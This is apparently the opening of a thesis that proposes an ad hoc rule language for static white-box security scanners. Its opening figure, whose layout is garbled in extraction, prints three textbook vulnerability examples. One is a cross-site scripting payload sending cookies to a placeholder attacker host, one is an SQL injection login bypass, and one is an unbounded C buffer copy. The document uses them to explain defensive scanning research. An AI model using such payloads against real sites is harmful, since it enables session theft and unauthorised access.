An Ad Hoc Writable Rule Language for White-Box Security Scanners

Author: Sebastian Schinzel

Referent: Prof. Dr. Alexander del Pino

Korreferent: Prof. Dr. Alois Schütte

Cross

SQL

Buffer

<script>

document.write(‘<img src=“http://criminal.org/?cookie=‘ +

document.cookie + ‘”>’);

</script>

Site ScriptingSELECT user

FROM authentication

WHERE username=‘administrator’

AND password=‘’ OR ‘1’=‘1’Injection-

while(‘\0’ != *src_ptr) {

*dst_ptr++ = *src_ptr++;

}Overflow

More than two thirds of the German population use the Internet for entertainment, communication, and for business purposes. To protect users and service providers from computer crime, data gets encrypted, access authorisations are checked, and Firewalls are installed to protect applications

However, the effectiveness of these security mechanisms depends significantly on their correct implementation. If security mechanisms in applications are flawed, an attacker may be able to circumvent the mechanisms and may cause great damages.

Locating and preventing security vulnerabilities in software development has been a research topic for decades. Facing the fast growing Internet, security assurance is becoming an integral part of web software development. However, manual security assessments can be complex and expensive. Because of this, tools are developed to automate the search for security vulnerabilities. These tools are called security scanners.

Security scanners can be distinguished in two groups: white-box scanners can access the internal structure of the target application such as source code. As opposed to that, black-box scanners approach the target application solely through external interfaces. They have only access to input and output of the target application. Consequently, white-box scanners have much more information on hand about the target application. They are able to

search for security vulnerabilities more effectively compared to black-box scanners.

Many static white-box scanners aim at conducting fully automated security audits. In doing so, the user of the scanner has hardly any possibilities to control internal activities of the scanner. Static white-box scanners often take source code as input, process it, and produce a report about found possible security vulnerabilities in the source code. Customisation of currently existing scanners is difficult or not possible at all. Because of this, the ”intelligence” of existing scanners is mostly limited to a fixed rule set.

Thus, the value of such a scanner is limited, even for a security expert. The user hardly gets information about the patterns the scanner searches for, about where the scanner searched, and which patterns where omitted during the search.

To make the handling of scanners more comprehen-sible, I develop a rule language for static white- box scanner in this thesis. This rule language can be used to look for complex source code patterns that may lead to security vulnerabilities. The rule language respects common quality characteristics of programming languages such as maintainability. New rules can be written during a security audit in an ad hoc manner. It enables the user to search for complex patterns in source code and presents the main user interface to the scanner. Furthermore, the rule language is able to support all common programming languages such as C, C++, C#, Java, JavaScript, and ABAP.